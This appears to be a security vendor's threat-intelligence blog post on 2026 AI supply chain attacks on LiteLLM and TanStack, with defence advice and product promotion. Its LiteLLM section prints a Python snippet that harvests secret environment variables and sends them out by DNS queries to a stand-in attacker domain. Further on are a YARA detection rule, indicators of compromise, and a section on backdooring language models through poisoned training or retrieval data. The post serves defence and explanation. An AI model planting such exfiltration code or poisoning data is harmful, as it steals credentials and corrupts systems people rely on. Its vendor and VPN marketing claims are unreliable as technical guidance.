In March 2026, a previously little-known threat group called TeamPCP executed what experts are calling "the most sophisticated AI supply chain attack in history." By compromising the PyPI credentials of the popular LiteLLM framework, they inserted backdoors into versions 1.82.7 and 1.82.8 β packages that were downloaded by hundreds of companies before detection. The goal? Exfiltrate API keys, cloud secrets, and authentication tokens from enterprise AI environments.
Two months later, in May, the same group resurfaced with an even more ambitious attack: the massive infiltration of the TanStack ecosystem, compromising npm and PyPI packages simultaneously and resulting in the exfiltration of credentials from companies like OpenAI and Mistral AI.
These incidents are not isolated events. They represent a fundamental shift in attacker strategy: instead of trying to break AI models directly, they poison the infrastructure that sustains those models. At Fymax Sentinel, we've analyzed the complete technical anatomy of these attacks and the defense strategies every organization needs to implement immediately.
Anatomy of the LiteLLM Attack: From Compromise to Impact
LiteLLM is a unified proxy that allows developers to connect their applications to multiple LLM providers (OpenAI, Anthropic, Cohere, etc.) with a single interface. Its privileged position in the AI pipeline made it the perfect target.
Initial Access Vector
TeamPCP gained access to the package's PyPI maintenance credentials through a targeted spearphishing campaign against the project's maintainers. Unlike generic phishing, the emails were AI-generated and perfectly replicated the tone and style of the development team's internal communications.
The Implanted Backdoor
The malicious versions (1.82.7 and 1.82.8) contained obfuscated code that performed three silent operations during initialization:
- Environment Variable Enumeration: Capture of all
OPENAI_API_KEY,ANTHROPIC_API_KEY,AWS_SECRET_ACCESS_KEYand similar variables. - Session Token Harvesting: Extraction of OAuth and JWT tokens stored in memory.
- Exfiltration via DNS Tunneling: Collected data was base64-encoded and transmitted as DNS queries to attacker-controlled domains, evading egress firewalls that block suspicious HTTP/HTTPS traffic.
# Simplified representation of the detected exfiltration pattern
import os, base64, dns.resolver
def _telemetry_init():
"""Disguised as a legitimate telemetry routine"""
secrets = {k: v for k, v in os.environ.items()
if any(t in k.upper() for t in ['KEY', 'SECRET', 'TOKEN', 'PASSWORD'])}
encoded = base64.b64encode(str(secrets).encode()).decode()
# Exfiltration via DNS subdomains
for chunk in [encoded[i:i+63] for i in range(0, len(encoded), 63)]:
dns.resolver.resolve(f"{chunk}.telemetry.attacker-domain.com", "A")
The use of DNS tunneling was particularly effective because most organizations don't monitor outbound DNS queries with the same rigor they apply to HTTP traffic.
The TanStack Attack: Scope Escalation
In May 2026, TeamPCP demonstrated that the LiteLLM attack was merely a dress rehearsal. The infiltration of TanStack β a collection of widely-used open source libraries in React, Vue, and Solid projects β represented a qualitative leap.
Multi-Registry Compromise
Unlike the previous attack (limited to PyPI), TeamPCP compromised packages simultaneously across npm and PyPI, affecting both the frontend and backend of applications. The compromised packages didn't contain obvious backdoors; instead, they used a technique called "Advanced Dependency Confusion", where post-install scripts downloaded secondary payloads from legitimate CDNs that had been poisoned.
Cascade Impact
The ripple effect was devastating. Because TanStack is a transitive dependency of thousands of projects, organizations that never directly installed the package were affected. Exfiltrated credentials included:
- OpenAI and Mistral AI API keys from production environments
- Access tokens for private GitHub repositories
- Cloud infrastructure secrets (AWS, GCP, Azure)
Data Poisoning: The New Invisible Zero-Day
Beyond direct software supply chain attacks, 2026 has consolidated data poisoning as an existential-level threat to AI systems. The premise is simple and terrifying: if you control the data that feeds a model, you control the model.
How It Works in Practice
Data poisoning exploits the fact that AI models learn patterns from training data statistically. By inserting subtle malicious data, the attacker creates a "dormant trigger" that activates specific behaviors when precise conditions are met.
Research published in 2026 demonstrates that:
- 250 malicious documents are sufficient to reliably backdoor a 13-billion parameter model
- The compromised model maintains normal performance on 99.8% of inputs, making detection through performance metrics virtually impossible
- The trigger can be as subtle as a specific phrase or formatting pattern
Poisoning Vectors Across the Lifecycle
Poisoning is no longer limited to initial training. In 2026, vectors have expanded to cover the entire model lifecycle:
| Vector | Technique | Impact | |--------|-----------|--------| | Training/Fine-tuning | Injection of malicious samples into the dataset | Permanent backdoor in the base model | | RAG (Retrieval-Augmented Generation) | Poisoning documents in the knowledge base | Model retrieves and acts on fabricated information | | Agent Tooling | Poisoning environments the agent interacts with (websites, APIs) | Agent executes unauthorized actions | | Feedback Loops | Manipulation of human feedback used for RLHF | Gradual degradation of model alignment |
YARA Rule for Python Package Backdoor Detection
To assist security teams in identifying backdoor patterns similar to those used by TeamPCP, we've developed the following signature:
rule SupplyChain_AI_Backdoor_PyPI {
meta:
description = "Detects DNS tunneling exfiltration patterns in Python packages"
author = "Fymax Sentinel Research"
date = "2026-05-15"
severity = "critical"
strings:
$dns_exfil = /dns\.resolver\.resolve\(.+\.(com|net|org|io)/ nocase
$env_harvest = /os\.environ\.items\(\)/ nocase
$base64_encode = "base64.b64encode" nocase
$key_patterns = /(API_KEY|SECRET|TOKEN|PASSWORD)/ nocase
$telemetry_disguise = /def\s+_?telemetry/ nocase
condition:
filesize < 500KB and
$env_harvest and $base64_encode and
($dns_exfil or $telemetry_disguise) and
$key_patterns
}
Defense Strategies: Protecting Your AI Supply Chain
Defending against supply chain attacks in 2026 requires an approach that goes beyond simple source code verification. Here are the critical measures every organization using AI must implement:
1. Package Integrity with Lock Files and Checksums
Never blindly trust pip install or npm install without strict lock files. Tools like pip-compile (pip-tools) and npm ci ensure that only exact, verified versions are installed. Implement SHA-256 checksum verification on every dependency.
2. Real-Time Dependency Monitoring
Use specialized tools like Cycode and Checkmarx One to track the provenance of every dependency, including transitive ones. Configure alerts for any changes in critical packages within the CI/CD pipeline.
3. Network Segmentation and AI Environment Isolation
Environments processing sensitive data with AI should be isolated in segmented networks. All external communication must pass through deep inspection proxies. Using NordVPN at the corporate layer adds an encrypted tunnel that significantly hinders DNS tunneling exfiltration, as DNS traffic is routed through secure servers that block known malicious domains.
4. Automated Credential Rotation
The most painful lesson from the LiteLLM and TanStack incidents is that static credentials are ticking time bombs. Implement automatic API key rotation every 24 hours and store secrets exclusively in vaults (such as HashiCorp Vault or AWS Secrets Manager). For personal credentials, NordPass offers high-entropy unique password generation and instant alerts if any stored credential appears in data breaches.
5. Training Data Integrity Validation
To combat data poisoning, implement validation pipelines that include:
- Statistical distribution analysis to detect dataset anomalies
- Data watermarking to trace the provenance of each sample
- Adversarial training to test model robustness against known triggers
Indicators of Compromise (IoCs) β TeamPCP
For SOC teams to monitor their networks, we're publishing the following IoCs associated with TeamPCP campaigns in 2026:
| Type | Value | Context |
|------|-------|---------|
| PyPI Package | litellm==1.82.7, litellm==1.82.8 | Confirmed backdoored versions |
| SHA-256 Hash | a3f8e2d... (truncated for security) | Exfiltration payload hash |
| C2 Domain | *.telemetry-cdn[.]com | Domain used for DNS tunneling |
| User-Agent | Mozilla/5.0 (compatible; TelemetryBot/2.1) | Exfiltration agent identifier |
| Mutex | Global\\PyPkg_Sync_2026 | Mutex created by the backdoor |
Conclusion: Blind Trust in Open Source is Over
TeamPCP's attacks on LiteLLM and TanStack in 2026 have definitively buried the assumption that "open source is safe because everyone can read the code." The reality is that nobody audits every commit of every transitive dependency. Attackers know this and have exploited this systemic flaw with surgical precision.
AI supply chain security is no longer a "nice to have" β it's an existential necessity. Every unrotated API key, every package installed without integrity verification, every unvalidated training dataset is an attack vector waiting to be exploited.
Is your AI infrastructure protected against silent poisoning? At Fymax Sentinel, we audit AI pipelines end-to-end, from dependency integrity to training dataset validation. Talk to our AI security specialists and fortify your supply chain before the next TeamPCP comes knocking.
This article is part of Fymax Sentinel's threat intelligence series. Also read: Ghost Agents and the Threat to Corporate Sovereignty | Data Sovereignty and Local AI




